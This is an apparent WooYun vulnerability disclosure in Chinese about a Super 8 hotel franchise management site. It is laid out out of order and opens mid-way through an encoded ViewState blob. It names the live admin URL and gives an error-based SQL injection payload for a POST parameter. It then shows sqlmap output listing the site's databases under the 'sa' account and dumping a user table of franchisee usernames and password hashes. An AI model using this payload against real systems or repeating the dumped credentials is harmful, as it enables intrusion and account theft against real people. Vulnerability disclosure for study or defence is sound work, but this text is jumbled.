2tlZD0hZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzEzJykuY2hlY2tlZDtfX2RvUG9zdEJhY2soJ2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDE1JGN0bDAwJywnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfMTMnKTsWFGYPZBYCZg8QDxYEHwsFIDcwMkYxREU3NjlFOTRDNzI5Q0EwN0NFRjkxM0M2ODlEHwxoFgIfDQUJYm9yZGVyOjA7ZGRkAgEPZBYCZg8WAh8OBQIxNGQCAg9kFgJmDxUBAGQCAw9kFgJmDxUBM+Wbm+W3neecgeahkeeRnuWFiei+ieagh+ivhuezu+e7n+iCoeS7veaciemZkOWFrOWPuGQCBA9kFgJmDxUBCHNjc3JnaGJzZAIFD2QWAmYPFQEG5qCH6K+GZAIGD2QWAmYPFQEJ5oiQ6YO95biCZAIHD2QWAmYPFQELMTM1ODE1NTgwNDFkAggPZBYCZg8VARMyMDE1LTA4LTI4IDE5OjA2OjQzZAIJD2QWAgIBDw8WBh8OBQnlt7LlrqHmoLgfDwpPHxACBGRkAg8PD2QWAh8KBdIDaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzE0JykuY2hlY2tlZCl7cmV0dXJuO31kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfMTQnKS5jaGVja2VkPSFkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfMTQnKS5jaGVja2VkO19fZG9Qb3N0QmFjaygnY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMTYkY3RsMDAnLCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF8xNCcpOxYUZg9kFgJmDxAPFgQfCwUgNzYzQjIxOEY3M0Q0NEQ4QUIzNUI0QUIxRDI3RTlGMDQfDGgWAh8NBQlib3JkZXI6MDtkZGQCAQ9kFgJmDxYCHw4FAjE1ZAICD2QWAmYPFQEAZAIDD2QWAmYPFQEe5LiK5rW35oGS6Zm25Y2r5rW05pyJ6ZmQ5YWs5Y+4ZAIED2QWAmYPFQEGZmpodHd5ZAIFD2QWAmYPFQEM5LqU6YeR5Y2r5rW0ZAIGD2QWAmYPFQEG5LiK5rW3ZAIHD2QWAmYPFQEJ6ZmI576O5qGCZAIID2QWAmYPFQETMjAxNS0wNi0wNCAxNTo0OToyOGQCCQ9kFgICAQ8PFgYfDgUJ5bey5a6h5qC4Hw8KTx8QAgRkZAIQDw8WAh4HVmlzaWJsZWhkZAISD2QWAmYPZBYCZg9kFgJmD2QWAgIBD2QWAgICD2QWBGYPDxYCHwJoZGQCAQ8PFgIfAmhkZAIHD2QWAgIDD2QWAmYPZBYCAgMPZBYCAgsPEA8WBh4NRGF0YVRleHRGaWVsZAUFVmFsdWUeDkRhdGFWYWx1ZUZpZWxkBQVWYWx1ZR8EZ2QQFQwNLS3or7fpgInmi6ktLQnlt7LliKDpmaQJ5bey5YGc55SoCeW3suWQr+eUqAnlj6/nvJbovpEJ5bey55Sf5pWICeW+heWuoeaguAnlt7LlrqHmoLgJ5bey5ouS57udCeacquWujOaIkAnlt7LlrozmiJAJ5bey5o+Q5LqkFQwACeW3suWIoOmZpAnlt7LlgZznlKgJ5bey5ZCv55SoCeWPr+e8lui+kQnlt7LnlJ/mlYgJ5b6F5a6h5qC4CeW3suWuoeaguAnlt7Lmi5Lnu50J5pyq5a6M5oiQCeW3suWujOaIkAnlt7Lmj5DkuqQUKwMMZ2dnZ2dnZ2dnZ2dnZGQCDQ9kFgICAw9kFgJmD2QWAgIDD2QWBAIBDxBkEBUkFeS+m+W6lOWVhuexu+WIq+e8luWPtxXkvpvlupTllYbnsbvliKvlkI3np7AM5Yy65Z+f5ZCN56ewDOWMuuWfn+WFqOensA/kvpvlupTllYbnvJblj7cP5L6b5bqU5ZWG5ZCN56ewDOivpue7huWcsOWdgAzokKXkuJrmiafnhacP56iO5Yqh55m76K6w6K+BFee7hOe7h+acuuaehOS7o+eggeivgRXlu4nmtIHku47kuJrotKPku7vkuaYb6LSo6YeP566h55CG5L2T57O76K6k6K+B5LmmD+eUn+S6p+iuuOWPr+ivgRjnibnmrorkuqflk4Hnu4/okKXorrjlj68S5YW25LuW6K+B5piO5paH5Lu2DOazqOWGjOi1hOmHkQzpgq7mlL/nvJbnoIEP6ZSA5ZSu6LSf6LSj5Lq6CeiBlOezu+S6ug/mjojmnYPnrb7nuqbkuroM57uP6JCl6IyD5Zu0D+S+m+W6lOWVhueugOS7iwzkurrlkZjmg4XlhrUS5rOV5Lq65Luj6KGo5aeT5ZCNDOW8gOaIt+mTtuihjBjlvIDmiLfpk7booYzmlK/ooYzlkI3np7AM6ZO26KGM5biQ5Y+3D+i0n+i0o+S6uuWnk+WQjQ/otJ/otKPkurrnlLXor50P6LSf6LSj5Lq65omL5py6D+i0n+i0o+S6uuS8oOecnw/ntKfmgKXogZTns7vkuroV57Sn5oCl6IGU57O75Lq655S16K+dDOWIm+W7uuaXtumXtAzlrqHmibnml7bpl7QG5aSH5rOoFSQQU3VwcGxpZXJUeXBlQ29kZRBTdXBwbGllclR5cGVOYW1lCEFyZWFOYW1lDEFyZWFGdWxsTmFtZQtTdXBwbGllck51bQxTdXBwbGllck5hbWUNQWRkcmVzc0RldGFpbA9CdXNpbmVzc0xpY2Vuc2UaVGF4UmVnaXN0cmF0aW9uQ2VydGlmaWNhdGUbT3JnYW5pemF0aW9uQ29kZUNlcnRpZmljYXRlHEhvbmVzdEJ1c2luZXNzUmVzcG9uc2liaWxpdHkeUXVhbGl0eU1hbmFnZW1lbnRTeXN0ZW1MaWNlbnNlEVByb2R1Y3Rpb25MaWNlbnNlHlNwZWNpYWxQcm9kdWN0c0J1c2luZXNzTGljZW5zZRFPdGhlckNlcnRpZmljYXRlcxFSZWdpc3RlcmVkQ2FwaXRhbApQb3N0YWxjb2RlC1NhbGVzTGVhZGVyCENvbnRhY3RzE0F1dGhvcml6ZWRTaWduYXRvcnkNQnVzaW5lc3NTY29wZQ9TdXBwbGllclN1bW1hcnkIU2FmZlNpemUPTGVnYWxQZXJzb25OYW1lDUJhbmtPZkRlcG9zaXQKQnJhbmNoTmFtZQtCYW5rQWNjb3VudAtNYW5hZ2VyTmFtZQxNYW5hZ2VyUGhvbmUQTWFuYWdlckNlbGxQaG9uZQpNYW5hZ2VyRmF4FEVtZXJnZW5jeUNvbnRhY3ROYW1lFUVtZXJnZW5jeUNvbnRhY3RQaG9uZQpDcmVhdGVUaW1lCUF1ZGl0VGltZQZSZW1hcmsUKwMkZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZ2dnZGQCCw8QZA8WAmYCARYCEAUO54q25oCBICDlgJLluo8FBVN0YXRlZxAFEeaOkuW6j+WPtyAg5YCS5bqPBQhUaGVPcmRlcmdkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WJQVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGNiQWxsb3dQYWdpbmcFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDAyJGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwwMiRjdGwwMAVNY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMDMkY3RsMDAFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDAzJGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwwNCRjdGwwMAVNY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMDQkY3RsMDAFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDA1JGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwwNSRjdGwwMAVNY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMDYkY3RsMDAFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDA2JGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwwNyRjdGwwMAVNY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMDckY3RsMDAFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDA4JGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwwOCRjdGwwMAVNY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMDkkY3RsMDAFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDA5JGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwxMCRjdGwwMAVNY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMTAkY3RsMDAFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDExJGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwxMiRjdGwwMAVNY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMTIkY3RsMDAFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDEzJGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwxMyRjdGwwMAVNY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMTQkY3RsMDAFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDE0JGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwxNSRjdGwwMAVNY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMTUkY3RsMDAFTWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDE2JGN0bDAwBU1jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwxNiRjdGwwMAVFY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGlidG5BZHZhbmNlZFF1ZXJ5BUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkaWJ0bk9yZGVyaW5nBUBjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkbGJPcmRlcmluZ05vBT5jdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkcmJ0bkFzY2VuZAU+Y3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJHJidG5Bc2NlbmQFP2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRyYnRuRGVzY2VuZAVBY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGxiT3JkZXJpbmdZZXMFQWN0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyDzwrAAwBCAIDZNRevwwoPf1D21NDL2ItQdgwC9wWQV6thAlfjNxFDZE7&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$txtWatermarked=11'&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$wtxtAdvancedQuery$TextBoxWatermarkExtender1_ClientState=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$cbAllowPaging=on&SmartRadioButtonColumn=ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$gvBS_Supplier$ctl11$ctl00&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfOrdering=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$Order=rbtnDescend&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=State&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$lbOrderingYes=TheOrder&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$hfAdvancedQuery=&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtSupplierTypeCode=1%' AND 1606=CONVERT(INT,(SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(118)+CHAR(113)+(SELECT (CASE WHEN (1606=1606) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(112)+CHAR(98)+CHAR(122)+CHAR(113))) AND '%'='&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtSupplierTypeName=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtAreaFullName=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtSupplierNum=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$txtSupplierName=1&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$ddlState=%E5%B7%B2%E5%90%AF%E7%94%A8&ctl00$ctl00$ContentPlaceHolder1$ContentPlaceHolder2$btnOKAdvancedQuery=%E7%A1%AE%E5%AE%9A
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
available databases [10]:
[*] master
[*] model
[*] msdb
[*] ReportServer$SQL2008
[*] ReportServer$SQL2008TempDB
[*] su8
[*] super8db
[*] super8db_2015_08_30
[*] super8dbTest
[*] tempdb
泄露大量加盟商登录信息:
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
Database: su8
Table: ecs_users
[390 entries]
+-----------+----------------------------------+---------+---------------------------+
| user_name | password | salt | email |
+-----------+----------------------------------+---------+---------------------------+
| 1111167 | 3D9EFE0C90564204 | <blank> | [email protected] |
| 1112004 | 3FA3866567EEE174A6E4FA5D3A77AF39 | <blank> | [email protected] |
| 1112013 | 3FA3866567EEE17460B6D086D00946C4 | <blank> | [email protected] |
| 1112078 | 3FA3866567EEE17433037D3F3384ED07 | <blank> | [email protected] |
| 1112096 | 3FA3866567EEE174876630E81514FDAA | <blank> | [email protected] |
| 1112126 | 3FA3866567EEE1743D736C73EB9E40CA | <blank> | [email protected] |
| 1112137 | 3FA3866567EEE17407E73BFD0A6E0C03 | <blank> | [email protected] |
| 1112163 | 3FA3866567EEE17451F207E4F548B43D | <blank> | [email protected] |
| 1113019 | E8EEF4882CBDD119E2A145F687F03DDA | <blank> | [email protected] |
| 1113029 | E8EEF4882CBDD1192A93116981582F3D | <blank> | [email protected] |
| 1113084 | E8EEF4882CBDD1195940392EEA161ADC | <blank> | [email protected] |
| 1113092 | E8EEF4882CBDD119D8E87BE60B3D259E | <blank> | [email protected] |
| 1113094 | A2035C15DA89E31ECFD89BB49D591644 | <blank> | [email protected] |
| 1113095 | E8EEF4882CBDD119BD0ECCE91EDA7EC7 | <blank> | [email protected] |
| 1113103 | E8EEF4882CBDD119262B7E56DB8A471D | <blank> | [email protected] |
| 1113109 | E8EEF4882CBDD119D004D6FCA04DC42F | <blank> | [email protected] |
| 1113111 | E8EEF4882CBDD1195BA434AE4C64973C | <blank> | [email protected] |
| 1113116 | E8EEF4882CBDD1198FCAF61DF8C0D3E4 | <blank> | [email protected] |
| 1113120 | E8EEF4882CBDD119096CFBBCB04CE0DE | <blank> | [email protected] |
| 1113127 | E8EEF4882CBDD1196CA429AF5BB7A7C9 | <blank> | [email protected] |
| 1113137 | E8EEF4882CBDD119D837F7AA44ED516A | <blank> | [email protected] |
| 1113157 | E8EEF4882CBDD1199C482817321EBDEF | <blank> | [email protected] |
| 1113163 | E8EEF4882CBDD119B27CBF463592E54D | <blank> | [email protected] |
| 1113166 | E8EEF4882CBDD11920ED403B70466B0B | <blank> | [email protected] |
| 1113168 | E8EEF4882CBDD11977123445D6BAD269 | <blank> | [email protected] |
| 1113170 | F545BD48634228FB71D1F4414D41B603 | <blank> | [email protected] |
| 1113182 | E8EEF4882CBDD11918F8020EF1F7C9B5 | <blank> | [email protected] |
| 1113190 | E8EEF4882CBDD1197D49FA6AA8A919A5 | <blank> | [email protected] |
| 1113193 | E8EEF4882CBDD119CD2D36E361393A57 | <blank> | [email protected] |
| 1113218 | E8EEF4882CBDD1198C693A55F0F0CE64 | <blank> | [email protected] |
| 1113235 | E8EEF4882CBDD119EA409E7FFCF83F43 | <blank> | [email protected] |
| 1113236 | E8EEF4882CBDD119746BB7EAC38E8654 | <blank> | [email protected] |
| 1113237 | E8EEF4882CBDD1199357177EC6941B83 | <blank> | [email protected] |
| 1114006 | 21FBE25419A6A547355141D20509A269 | <blank> | [email protected] |
| 1114012 | 26E17FC4B7BC4381B651A1917C7F3086 | <blank> | [email protected] |
| 1114014 | 21FBE25419A6A547961B6C41F13DA277 | <blank> | [email protected]
加盟商数量:

46.png

|

漏洞证明:

问题从这里开始: WooYun: 速8酒店某站目录遍历引起的后台管理页面越权访问
这里有个未授权访问,但是官方修复不彻底,禁止列目录了,然后直接访问这个地址:
http://mys8.super8.com.cn:81/pages/WS/News/WS_NewsManage.aspx
点高级查询随便填,抓包,

44.png


45.png


值为1的这几个参数都存在注入,
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET 4.0.30319, Microsoft IIS 7.5, ASP.NET
back-end DBMS: Microsoft SQL Server 2008
current user: 'sa'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: #1* ((custom) POST)
Type: error-based
Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=/wEPDwULLTExOTI1NTQ4MDMPFgQeClF1ZXJ5U3RhdGULKWVTdXBlcjguRW50aXR5LkNvbW1vbi5RdWVyeVN0YXRlLCBTdXBlcjguRW50aXR5LCBWZXJzaW9uPTEuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49bnVsbAEeDk9yZGVyQ29uZGl0aW9uBRhTdGF0ZSBERVNDLFRoZU9yZGVyIERFU0MWAmYPZBYCZg9kFgICAw9kFgICBg9kFgICAw9kFggCAQ9kFgQCAQ8PFgIeB0VuYWJsZWRoZGQCCw8PFgIeDVdhdGVybWFya1RleHQFFeivt+i+k+WFpeafpeivouadoeS7tmQWAmYPZBYCAgMPFgIfAwUV6K+36L6T5YWl5p+l6K+i5p2h5Lu2ZAIDDzwrABEDAA8WDB4LXyFEYXRhQm91bmRnHgtfIUl0ZW1Db3VudAIqHi9Fc29mdF9fU21hcnRHcmlkVmlld19fU21hcnRSYWRpb0J1dHRvbkdyb3VwTmFtZQUWU21hcnRSYWRpb0J1dHRvbkNvbHVtbh4RSXNFbXB0eURhdGFTb3VyY2VoHg9BbGxTZWxlY3RWYWx1ZXMy9AEAAQAAAP////8BAAAAAAAAAAQBAAAAf1N5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkxpc3RgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249NC4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0DAAAABl9pdGVtcwVfc2l6ZQhfdmVyc2lvbgYAAAgICQIAAAABAAAACgAAABECAAAABAAAAAYDAAAAIDU0NjQ4NDZBREVBNzREREFCNDJERDZBMTJDREJERDQxDQMLHghyb3dDb3VudAIqZAEQFgAWABYADBQrAAAWAmYPZBYiAgEPD2QWAh4Kb25kYmxjbGljawXOA2lmKGRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF8wJykuY2hlY2tlZCl7cmV0dXJuO31kb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfMCcpLmNoZWNrZWQ9IWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF8wJykuY2hlY2tlZDtfX2RvUG9zdEJhY2soJ2N0bDAwJGN0bDAwJENvbnRlbnRQbGFjZUhvbGRlcjEkQ29udGVudFBsYWNlSG9sZGVyMiRndkJTX1N1cHBsaWVyJGN0bDAyJGN0bDAwJywnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfMCcpOxYUZg9kFgJmDxAPFgQeHkVzb2Z0X19TbWFydFJhZGlvQnV0dG9uX19WYWx1ZQUgMERBMzk5RjRBREYzNDk0QzhDOEExNUE5NUM4NEQ5NzUeB0NoZWNrZWRoFgIeBXN0eWxlBQlib3JkZXI6MDtkZGQCAQ9kFgJmDxYCHgRUZXh0BQExZAICD2QWAmYPFQEAZAIDD2QWAmYPFQEh5Zac5Li06Zeo5a625YW36IKh5Lu95pyJ6ZmQ5YWs5Y+4ZAIED2QWAmYPFQEHc3h4bG1qamQCBQ9kFgJmDxUBBuW6iuWeq2QCBg9kFgJmDxUBCee7jeWFtOW4gmQCBw9kFgJmDxUBBuiDoeWpt2QCCA9kFgJmDxUBEzIwMTUtMDYtMDQgMTU6Mzc6MjNkAgkPZBYCAgEPDxYGHw4FCeW3suWuoeaguB4JRm9yZUNvbG9yCk8eBF8hU0ICBGRkAgIPD2QWAh8KBc4DaWYoZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzEnKS5jaGVja2VkKXtyZXR1cm47fWRvY3VtZW50LmdldEVsZW1lbnRCeUlkKCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF8xJykuY2hlY2tlZD0hZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzEnKS5jaGVja2VkO19fZG9Qb3N0QmFjaygnY3RsMDAkY3RsMDAkQ29udGVudFBsYWNlSG9sZGVyMSRDb250ZW50UGxhY2VIb2xkZXIyJGd2QlNfU3VwcGxpZXIkY3RsMDMkY3RsMDAnLCdDb250ZW50UGxhY2VIb2xkZXIxX0NvbnRlbnRQbGFjZUhvbGRlcjJfZ3ZCU19TdXBwbGllcl9jdGwwMF8xJyk7FhRmD2QWAmYPEA8WBB8LBSAxMTczNzlBNkYyODI0NkFBODhENUJGOTM2MkM4NTEzOB8MaBYCHw0FCWJvcmRlcjowO2RkZAIBD2QWAmYPFgIfDgUBMmQCAg9kFgJmDxUBAGQCAw9kFgJmDxUBJOWMl+S6rOS4h+aBqeWMluWtpuWItuWTgeaciemZkOWFrOWPuGQCBA9kFgJmDxUBBmJqd2VoeGQCBQ9kFgJmDxUBCea4hea0geWJgmQCBg9kFgJmDxUBBuWMl+S6rGQCBw9kFgJmDxUBBuephuaso2QCCA9kFgJmDxUBEzIwMTUtMDgtMjggMTk6MjI6MThkAgkPZBYCAgEPDxYGHw4FCeW3suWuoeaguB8PCk8fEAIEZGQCAw8PZBYCHwoFzgNpZihkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfMicpLmNoZWNrZWQpe3JldHVybjt9ZG9jdW1lbnQuZ2V0RWxlbWVudEJ5SWQoJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzInKS5jaGVja2VkPSFkb2N1bWVudC5nZXRFbGVtZW50QnlJZCgnQ29udGVudFBsYWNlSG9sZGVyMV9Db250ZW50UGxhY2VIb2xkZXIyX2d2QlNfU3VwcGxpZXJfY3RsMDBfMicpLmNoZWNrZWQ7X19kb1Bvc3RCYWNrKCdjdGwwMCRjdGwwMCRDb250ZW50UGxhY2VIb2xkZXIxJENvbnRlbnRQbGFjZUhvbGRlcjIkZ3ZCU19TdXBwbGllciRjdGwwNCRjdGwwMCcsJ0NvbnRlbnRQbGFjZUhvbGRlcjFfQ29udGVudFBsYWNlSG9sZGVyMl9ndkJTX1N1cHBsaWVyX2N0bDAwXzInKTsWFGYPZBYCZg8QDxYEHwsFIDE2RTE2QjQ2NzcyRTRFODVBODVGN0ExOUFBQ0Y1QkVFHwxoFgIfDQUJYm9yZGVyOjA7ZGRkAgEPZBYCZg8WAh8OBQEzZAICD2QWAmYPFQEAZAIDD2QWAmYPFQEh5Y2X6YCa5paw57qq5YWD5a6+6aaG55So5ZOB5YWs5Y+4ZAIED2QWAmYPFQEFbnR4anlkAgUPZBYCZg8VAQbluIPojYlkAgYPZBYCZg8VAQnljZfpgJrluIJkAgcPZBYCZg8VAQnmvZjmmZPnjrJkAggPZBYCZg8VARMyMDE1LTA2LTA0IDE1OjQwOj